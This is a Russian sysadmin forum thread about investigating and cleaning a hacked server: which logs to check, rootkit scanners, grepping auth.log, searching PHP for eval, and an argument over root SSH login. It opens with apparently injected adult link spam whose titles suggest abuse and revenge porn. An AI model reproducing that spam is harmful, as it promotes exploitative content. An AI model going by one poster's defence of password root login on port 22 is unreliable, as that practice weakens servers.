href="http://www.freelifetimexxxpass.com/track/Y68HAIGAgIAAHwAAc210cDUA/?d=signup">           <img src="http://www.a1971.com/tempe/FLP_top3.jpg">        </a></div>  <div class="content">		<ul>	           <li><a target="_blank" href="http://www.abusedteenstube.com/track/Y68HAIGAgIAAEwAAc210cDUA/"><p>Abused Teens Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/AbusedTeens.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeanimexxxtube.com/track/Y68HAIGAgIAABwAAc210cDUA/"><p>Free Anime XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAnimeXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.bigtitstofucktube.com/track/Y68HAIGAgIAAGQAAc210cDUA/"><p>Big Tits Fuck Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/BigTitsToFuckTube.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.monstercocksxxxtube.com/track/Y68HAIGAgIAAEQAAc210cDUA/"><p>Monster Cock XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/MonsterCockXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.teenpornxxxtube.com/track/Y68HAIGAgIAAFQAAc210cDUA/"><p>Teen Porn XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/TeenPornXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeamateurtubexxx.com/track/Y68HAIGAgIAABQAAc210cDUA/"><p>Free Amateur XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAmateurTubeXXX.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.juicyteenstube.com/track/Y68HAIGAgIAAEAAAc210cDUA/"><p>Juicy Teens Tobe FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/JuicyTeensTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freehardcoretubexxx.com/track/Y68HAIGAgIAACgAAc210cDUA/"><p>Free Hardcore Tube XXX</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeHardcoreTubeXXX.jpg"></a></li>	           <li><a target="_blank" href="http://www.exgirlfriendrevengetube.com/track/Y68HAIGAgIAAFgAAc210cDUA/"><p>ExGirlfriend Revenge Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/ExgirlfriendRevenge.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://secure.watchmygf.com/track/MjE1MjIyOjI6MQ/"><p>Watch My GF $1only</p><img width="298" height="198" src="http://www.a1971.com/tempe/ama_watchmygf.jpg"></a></li>	           <li><a target="_blank" href="http://secure.meandmyasian.com/track/MjE1MjIyOjI6MTE/"><p>Me And My Asian $1only</p><img width="298" height="198" src="http://www.a1971.com/tempe/ama_asian.jpg"></a></li>	           <li><a target="_blank" href="http://www.freetrannytubexxx.com/track/Y68HAIGAgIAADwAAc210cDUA/"><p>Free Tranny XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeTrannyTubeXXX.jpg"></a></li>	    </ul>		<ul>	           <li><a target="_blank" href="http://www.freelesbianxxxtube.com/track/Y68HAIGAgIAADAAAc210cDUA/"><p>Free Lesbian XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreelesbianXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.cartoonxxxtube.com/track/Y68HAIGAgIAAAgAAc210cDUA/"><p>Cartoon XXX Tube FREE</p><img width="298" height="198" src="http://www.a1971.com/tempe/CartoonXXXTube.jpg"></a></li>	           <li><a target="_blank" href="http://www.freeasiansxxxtube.com/track/Y68HAIGAgIAACAAAc210cDUA/"><p>Free Asian XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeAsiansXXXTube.jpg"></a></li>	    </ul>				<ul>	           <li><a target="_blank" href="http://www.freemilftubexxx.com/track/Y68HAIGAgIAADQAAc210cDUA/"><p>Free Milf XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeMilfTubeXXX.jpg"></a></li>	           <li><a target="_blank" href="http://www.exgirlfriendscaptured.com/track/Y68HAIGAgIAAFwAAc210cDUA/"><p>ExGirlfriends Captured</p><img width="298" height="198" src="http://www.a1971.com/tempe/ExgirlfriendsCaptured.jpg"></a></li>	           <li><a target="_blank" href="http://www.freegayxxxtube.com/track/Y68HAIGAgIAACQAAc210cDUA/"><p>Free Gay XXX Tube</p><img width="298" height="198" src="http://www.a1971.com/tempe/FreeGayXXXTube.jpg"></a></li>	    </ul>	   </div>   </div></body></html>

Качаю теперь логи apach2 всего-то 9Gb... Какие еще логи стоит смотреть и изучать?

Перемещено mono из admin

1 2 3 4 5 6

Какие еще логи стоит смотреть и изучать?

обычно разгадка в логе ftp сервера, через который ты админил сервак с маздайного завирусованного компьютера.

emulek
()

Качаю теперь логи apach2 всего-то 9Gb

logrotate? нет, не слышал.

emulek
()
Ответ на: комментарий от unrealtech

ssh

порт 22, аккаунт root, пароль…

Я угадал? Тогда делайте вдоль, или хотя-бы идите в поэты(дворники, хоть в педерасты, только не в админы).

По уму, надо всё сносить нахер, и разворачивать новую систему. По опыту знаю, что вы на авось надеетесь. Потому дам ссылок:

http://www.chkrootkit.org/

http://rkhunter.sourceforge.net/

если ваш сервер ещё не порутали, то есть вероятность всё исправить малой кровью. Т.е. войти как рут, сделать аккаунт, настроить порт $RANDOM, сделать ключ, войти (по ssh в аккаунт), и закрыть рута. А в рута(при необходимости) входить с этого аккаунта через sudo/su.

Удачи.

emulek
()
Ответ на: комментарий от unrealtech

и да, logrotate тоже настройте. Как и всё остальное. Даже если этот сервак не спасёте, так хоть опыт получите.

emulek
()
Ответ на: комментарий от emulek

порт 22, аккаунт root, пароль…
Я угадал? Тогда делайте вдоль, или хотя-бы идите в поэты(дворники, хоть в педерасты, только не в админы).

Нашелся советчик блин.) У меня на своем сервере и домашнем компе «порт 22, аккаунт root, пароль» уже года 3 и ни кто не пролез, просто пароль добротный.

TDrive ★★★★★
()
Ответ на: комментарий от emulek

А в рута(при необходимости) входить с этого аккаунта через sudo/su.

Ну ты и дурак... Тебя это магическое действие запарит уже через 2-3 недели и ты как адекватный человек сделаешь доступ по ключам.

TDrive ★★★★★
()

Много файлов создано

Посмотри от какого пользователя созданы файлы, это покажет в какую сторону копать.

Какие еще логи стоит смотреть и изучать?

логи ssh, bash... это все очень индивидуально и зависит от настройки...

TDrive ★★★★★
()

Качаю теперь логи apach2 всего-то 9Gb...

Есть такая команда tail

TDrive ★★★★★
()

скорее всего проблема в ipb, mediawiki, wordpress. Как все зачистишь - каждому виртуальному хосту прописывай open_basedir с его DOCUMENT_ROOT, дабы если поломают один - все остальные не ломались.
Чистить можно при помощи sed, когда будешь находить идентичные строки. Также ищи по строке eval в PHP-файлах

r0ck3r ★★★★★
()
Ответ на: комментарий от TDrive

Нашелся советчик блин.) У меня на своем сервере и домашнем компе «порт 22, аккаунт root, пароль» уже года 3 и ни кто не пролез, просто пароль добротный.

Ну ты и дурак... Тебя это магическое действие запарит уже через 2-3 недели и ты как адекватный человек сделаешь доступ по ключам.

шизофазия, как она есть.

emulek
()
Ответ на: комментарий от emulek

chkrootkit и rkhunter не помогут после взлома. Их нужно было устанавливать и создавать базы до взлома, да и вообще, они ненадежные.

ValdikSS ★★★★★
()
Ответ на: комментарий от ziemin

А зачем тебе root? Я первым делом лочу. sudo достаточно всем.

Потому что в 95% случаев если нужно что то сделать на сервере это делается из под рута. По крайней мере у меня так.

TDrive ★★★★★
()
Последнее исправление: TDrive (всего исправлений: 2)
Ответ на: комментарий от ziemin

Заводишь пользователя и даёшь ему sudo, а root лочишь. По крайней мере у меня так.

Зачем? У меня сейчас, там где нужно доступ по ключам, рут не залочен но пароль хрен подберешь. Что я выиграю заведя левого пользователя и настроив судо? Лишние телодвижения с вводами пароля + потенциальная дыра в безопасности? Или ты считаешь что злоумышленник взломав твой аккаунт не додумается попробовать судо?

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

Лишние телодвижения с вводами пароля + потенциальная дыра в безопасности

У тебя какой-то неправильный ssh. Доступ по ключу можно сделать и пользователю. Какая же это дыра, если тебя зовут, например EvlaMpiY? Считай имя пользователя это дополнительный пароль.

ziemin ★★
()
Ответ на: комментарий от ziemin

У тебя какой-то неправильный ssh. Доступ по ключу можно сделать и пользователю.

Я не говорил что его нельзя сделать пользователю. просто зачем?

Какая же это дыра, если тебя зовут, например EvlaMpiY? Считай имя пользователя это дополнительный пароль.

Но у меня и так достаточно сложный пароль, что бы его можно было подобрать. Зачем мне все эти понты с именем пользователя? К тому же, к гадалке не ходи, у меня бы это имя пользователя было бы tdrive, а у тебя ziemin, угадал?) А пароль какой нибудь asdfzxcv ведь имя пользователя хрен кто угадает.) Ну ладно может у тебя не так все печально, но какой нибудь emulek обязательно додумается. Вот тебе и дыра в безопасности, а плюсы... я так ни одного плюса и не услышал.

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

я так ни одного плюса и не услышал.

Имя пользователя(64 бита) + пароль(64 бита) * таймаут по количеству попыток = ДОФИГИЩА!!!

От целевой атаки тебя и ключ не спасёт. А вот школоскрипты рубит начисто.

ziemin ★★
()
Ответ на: комментарий от ziemin

Имя пользователя(64 бита) + пароль(64 бита) * таймаут по количеству попыток = ДОФИГИЩА!!!

То есть ты реально думаешь, что имя пользователя из 8 символов + пароль из 8 символов это лучше чем пароль от рута из 16 символов?

От целевой атаки тебя и ключ не спасёт. А вот школоскрипты рубит начисто.

Почему не спасет? И да, что меняется при твоем варианте с левым пользователем?

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

То есть ты реально думаешь, что имя пользователя из 8 символов + пароль из 8 символов это лучше чем пароль от рута из 16 символов?

Гораздо. Дело в том, что на каждого пользователя придётся пароли перебирать заново. Какой пароль root: 1, 11, 111. какой пароль у пользователя aaaaaaaa: 1, 11, 111...

Почему не спасет?

Есть и другие дыры.

И да, что меняется при твоем варианте с левым пользователем?

Если рут залочен, то рутшелл уже отпадает, за исключением... Короче я не сильно в этом разбираюсь, но вроде пара вариантов отпадает.

ziemin ★★
()
Ответ на: комментарий от ziemin

Гораздо. Дело в том, что на каждого пользователя придётся пароли перебирать заново. Какой пароль root: 1, 11, 111. какой пароль у пользователя aaaaaaaa: 1, 11, 111...

А то что и в одном и в другом случае одинаковое количество комбинаций ничего?

Если рут залочен, то рутшелл уже отпадает, за исключением... Короче я не сильно в этом разбираюсь, но вроде пара вариантов отпадает.

Ни чего там не отпадает + не забывай про судо с паролем из 8 символов который возможно получен на этапе получения доступа к левому пользователю. Или судо вообще без пароля, что будет эпик фейлом.

Таким образом, как ни крути, левый пользователь с судо отрицательно влияет на общую безопасность системы и добавляет лишних телодвижений при управлении сервером.

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

Таким образом, как ни крути, левый пользователь с судо отрицательно влияет на общую безопасность системы и добавляет лишних телодвижений при управлении сервером.

Согласен, sudo - лишняя сущность. Но я бы использовал su, если кроме рутовых задач есть и другие.

anonymous
() 
grep "Accepted password for" /var/log/auth.log

и глянь по ip

snaf ★★★★★
()
Последнее исправление: snaf (всего исправлений: 1)
Ответ на: комментарий от TDrive

Таким образом, как ни крути, левый пользователь с судо отрицательно влияет на общую безопасность системы и добавляет лишних телодвижений при управлении сервером

Так убедительно.

А то что и в одном и в другом случае одинаковое количество комбинаций ничего?

Ты даже не читал мой ответ. 

Дело в том, что на каждого пользователя придётся пароли перебирать заново.
ziemin ★★
()

Софт на сервере обновлял? Уязвимых пакетов не держал? Левых реп не подключал? Из под оффтопика не админил? Соединение с сервером при удалёноой админке шифровал? Пароль на сервере больше 10 символов был? Надеюсь, что сложный, типа 

Kd8^isj*P]s%w
Если используешь пароли вида 
vasya1990
то удивляться нечему.

peregrine ★★★★★
()
Ответ на: комментарий от ziemin

Дело в том, что на каждого пользователя придётся пароли перебирать заново.

Ты реально не понимаешь, что подбирать n^8 паролей для n^8 пользователей это тоже самое, что и подбирать n^16 паролей рута??

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

Во-первых 64бита на пароль я привёл для примера. Никто не мешает юзеру завести пароль MAX_PASSWORD_LENGTH байт.

Во-вторых подбором имени пользователя кроме как по словарю почему-то никто не занимается. Открой новую эру взломов, хакир ты наш.

ziemin ★★
()
Ответ на: комментарий от ziemin

Во-первых 64бита на пароль я привёл для примера. Никто не мешает юзеру завести пароль MAX_PASSWORD_LENGTH байт.

На самом деле и 10+ символов хватит остальное излишне.

Во-вторых подбором имени пользователя кроме как по словарю почему-то никто не занимается. Открой новую эру взломов, хакир ты наш.

А, то есть твоя защита построена на основе старого русского авось, ок, больше у меня нету вопросов.

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

твоя защита построена на основе старого русского авось

Как выясняется старый русский авось вполне математически обоснован. А у тебя имя пользователя root!

ziemin ★★
()

Просто решили перевести всех пользователей с мобильных на свой сайт.
А хозяин если сервер не заходит, то его сайт для него открывает, так как он заходит с обычного браузера. Так можно оставаться незамеченным дольше. Для начала 'last'.

anonymous_sama ★★★★★
()
Ответ на: комментарий от ValdikSS

chkrootkit и rkhunter не помогут после взлома. Их нужно было устанавливать и создавать базы до взлома, да и вообще, они ненадежные.

что предложишь? Если(цитирую): По уму, надо всё сносить нахер, и разворачивать новую систему.

emulek
()
Ответ на: комментарий от TDrive

Потому что в 95% случаев если нужно что то сделать на сервере это делается из под рута. По крайней мере у меня так.

потому что у тебя руки из жопы.

emulek
()
Ответ на: комментарий от TDrive

Но у меня и так достаточно сложный пароль, что бы его можно было подобрать. Зачем мне все эти понты с именем пользователя?

обычно атака идёт не целенаправленно, а из ботнета. Ботнет тупой,и может только root аккаунт парсить. Ещё один аккаунт — дополнительная ступень защиты.

emulek
()
Ответ на: комментарий от TDrive

Таким образом, как ни крути, левый пользователь с судо отрицательно влияет на общую безопасность системы и добавляет лишних телодвижений при управлении сервером.

ты это Марку Шатлвроту скажи. Ладно я дурак, он тоже?

emulek
()
Ответ на: комментарий от amazpyel

удобнее быть IRL неадекватным дебилом, а на ЛОРе рассказывать, какой ты умный криптоаналитег?

В принципе — да.

emulek
()
Ответ на: комментарий от TDrive

Да рут и что?

ну во первых это засирание логов. Ты не можешь отфильтровать СВОЙ вход. А вот если-бы ты входил как TDrive, тебе было-бы проще.

Впрочем — твоё право создавать себе проблемы.

emulek
()
Ответ на: комментарий от emulek

потому что у тебя руки из жопы.

Давай расскажи нам ак должно быть у людей у которых руки не из жопы.)

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

Давай расскажи нам ак должно быть у людей у которых руки не из жопы.)

смысл? Я уже много лет рассказываю, но меня мало кто слушает.

emulek
()
Ответ на: комментарий от emulek

обычно атака идёт не целенаправленно, а из ботнета. Ботнет тупой,и может только root аккаунт парсить. Ещё один аккаунт — дополнительная ступень защиты.

Привари к корпусу сервера металлическую решетку и якорь, это будет еще одна ступень защиты.

TDrive ★★★★★
()
Ответ на: комментарий от emulek

ну во первых это засирание логов. Ты не можешь отфильтровать СВОЙ вход. А вот если-бы ты входил как TDrive, тебе было-бы проще.
Впрочем — твоё право создавать себе проблемы.

Я не вижу проблемы в засирании логов.

TDrive ★★★★★
()
Ответ на: комментарий от emulek

смысл? Я уже много лет рассказываю, но меня мало кто слушает.

В данном случае я тебе задал прямой вопрос и было бы интересно услышать ответ, если конечно есть что сказать.

TDrive ★★★★★
()
Ответ на: комментарий от TDrive

Подобрать то пароль все равно не получится.

Значит все твои выходы вовне действуют тоже от этого имени. Я MiM. Бойся меня!!! Буу

ziemin ★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2 3 4 5 6
Security